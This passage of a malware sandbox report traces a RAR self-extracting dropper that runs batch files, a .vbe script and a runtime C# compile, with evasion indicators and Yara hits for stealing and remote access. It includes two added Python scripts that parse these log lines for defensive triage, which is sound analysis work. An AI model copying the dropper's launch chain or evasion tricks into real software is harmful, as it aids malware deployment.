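                hits[path]["system_name_unexpected_path"].add(path)
        m = SLEEP_RE.match(line)
        if m:
            ms = int(m.group("ms"))
            if ms >= INFINITE_SLEEP_MS:
                hits[m.group("proc")]["infinite_sleep"].add(ms)
            elif ms >= LONG_SLEEP_MS:
                hits[m.group("proc")]["long_sleep"].add(ms)
            continue
        m = WATCH_RE.match(line)
        if m:
            hits[m.group("proc")]["write_watch_alloc"].add(m.group("addr").upper())
    return {p: {k: sorted(v) for k, v in ind.items()} for p, ind in hits.items()}


def score(hits):
    """Processes ordered by how many distinct indicator kinds they tripped."""
    return sorted(((len(ind), p) for p, ind in hits.items()), reverse=True)


# Constructed input: verbatim copies of lines from this section of the report.
SAMPLE_LINES = [
    r"Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 12C0000 memory reserve | memory write watch Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -600000s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7804 Thread sleep time: -922337203685477s >= -30000s Jump to behavior",
    r"Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477",
    r"Source: work.exe, 00000003.00000003.1630533570.0000000002D5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y.,",
    r"Source: SurrogatewebSession.exe, 00000008.00000002.1740585685.000000001C0B9000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000027.00000002.1785246422.000001FA32E09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    r"Source: C:\Windows\System32\conhost.exe Last function: Thread delayed",
]

if __name__ == "__main__":
    result = classify(SAMPLE_LINES)
    for kinds, proc in score(result):
        print(f"{kinds} indicator kind(s): {proc}")
        for name, values in result[proc].items():
            print(f"    {name}: {values}")
```

To use it on a whole report, feed `classify()` the text split into lines; the thresholds and watchlists are deliberately small and should be tuned to the environment, and the bare-name keys produced by memory-dump lines will not merge with full-path keys unless you normalise them.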

HIPS / PFW / Operating System Protection Evasion

Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class73.cs Reference to suspicious API methods: A86.VirtualProtect(intPtr, (UIntPtr)(ulong)num, A86.OkN.flag_2, out var okN_)
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class74.cs Reference to suspicious API methods: A86.GetProcAddress(A86.GetModuleHandle(string_0), string_1)
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, AFA.cs Reference to suspicious API methods: A86.VirtualAlloc(intPtr3, (IntPtr)uint_0, A86.U14.flag_0 | A86.U14.flag_1, A86.OkN.flag_2)
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
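Read one at a time, the thirteen "Process created" lines above make it easy to miss that there are three separate cmd.exe instances in the chain and that the last one relaunches SurrogatewebSession.exe after a w32tm delay. The following is an added example (mine, not the sandbox's tooling) that rebuilds the tree from lines in this format. Since the report carries no PIDs, each parent is resolved to the most recently created process with that path, which is the order the report lists them in. The sample input is constructed from the lines above; the annotations are my reading of the chain, namely that the w32tm /stripchart call is the usual batch-file sleep substitute and that csc.exe means a C# payload is compiled on the victim at run time.

```python
"""Rebuild the process tree from a sandbox report's "Process created" lines.

Added example for this report, not sandbox tooling. SAMPLE_LINES is
constructed from the thirteen "Process created" entries in this section;
the WATCHLIST annotations are my own reading of the chain.
"""
import re
from dataclasses import dataclass, field

CREATED_RE = re.compile(
    r"^Source: (?P<parent>.+?) Process created: (?P<child>\S+)\s*(?P<cmd>.*?)(?: Jump to behavior)?$")

# Binaries in this chain worth a second look, keyed by lowercase basename.
WATCHLIST = {
    "wscript.exe": "script host run on a .vbe dropped under AppData\\Roaming",
    "csc.exe": "C# compiler invoked at run time (payload compiled on the box)",
    "w32tm.exe": "w32tm /stripchart used as a sleep primitive inside the .bat",
    "unknown": "child image the sandbox could not resolve",
}


@dataclass
class Node:
    path: str
    cmdline: str = ""
    children: list = field(default_factory=list)

    @property
    def name(self):
        return self.path.rsplit("\\", 1)[-1]


def parse_tree(lines):
    """Return the root nodes. A parent path is resolved to the most recently
    created process with that path, which keeps the two SysWOW64 cmd.exe
    instances apart even though the report carries no PIDs."""
    created, roots = [], []
    for raw in lines:
        m = CREATED_RE.match(raw.strip())
        if not m:
            continue
        parent = next((n for n in reversed(created) if n.path == m.group("parent")), None)
        if parent is None:
            parent = Node(m.group("parent"))
            roots.append(parent)
            created.append(parent)
        child = Node(m.group("child"), m.group("cmd"))
        parent.children.append(child)
        created.append(child)
    return roots


def walk(node):
    """Depth-first generator over a subtree."""
    yield node
    for c in node.children:
        yield from walk(c)


def flagged(root):
    """(name, reason) pairs for every watchlisted binary in the tree."""
    return [(n.name, WATCHLIST[n.name.lower()]) for n in walk(root) if n.name.lower() in WATCHLIST]


def render(node, depth=0):
    """Indented text tree, one line per process, watchlist hits marked."""
    flag = WATCHLIST.get(node.name.lower())
    line = "  " * depth + node.name + (f"  <-- {flag}" if flag else "")
    return "\n".join([line] + [render(c, depth + 1) for c in node.children])


# Constructed input: the "Process created" lines of this section, verbatim.
SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" " Jump to behavior',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD Jump to behavior',
    r'Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" Jump to behavior',
    r'Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" Jump to behavior',
    r'Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" " Jump to behavior',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe" Jump to behavior',
    r'Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline" Jump to behavior',
    r'Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat" Jump to behavior',
    r'Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"',
    r'Source: C:\Windows\System32\cmd.exe Process created: unknown unknown',
]

if __name__ == "__main__":
    for root in parse_tree(SAMPLE_LINES):
        print(render(root))
```

The most-recent-parent rule is a heuristic: it is right for a report ordered by creation time, as this one is, but a chain where an older instance of the same path spawns a child after a newer one was created would be attached to the wrong node. When PIDs are available, key on them instead.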
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3BEFF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree, 0_2_00A3BEFF
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40826 cpuid 0_2_00A40826
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00A3C093
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: GetLocaleInfoW,GetNumberFormatW, 3_2_0032C093
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: GetLocaleInfoW,GetNumberFormatW, 4_2_0073AF0F
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Queries volume information: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Queries volume information: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
Source: C:\Recovery\winlogon.exe Queries volume information: C:\Recovery\winlogon.exe VolumeInformation
Source: C:\Recovery\winlogon.exe Queries volume information: C:\Recovery\winlogon.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Queries volume information: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
Source: C:\Recovery\winlogon.exe Queries volume information: C:\Recovery\winlogon.exe VolumeInformation
Source: C:\Recovery\winlogon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3F05C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00A3F05C
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2C365 GetVersionExW, 0_2_00A2C365
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 8.0.SurrogatewebSession.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.70006d6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.70006d6.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.66f46d6.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: work.exe PID: 7588, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwartg.exe PID: 7628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SurrogatewebSession.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\winlogon.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 8.0.SurrogatewebSession.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.70006d6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.70006d6.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.66f46d6.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: work.exe PID: 7588, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwartg.exe PID: 7628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SurrogatewebSession.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\winlogon.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, type: DROPPED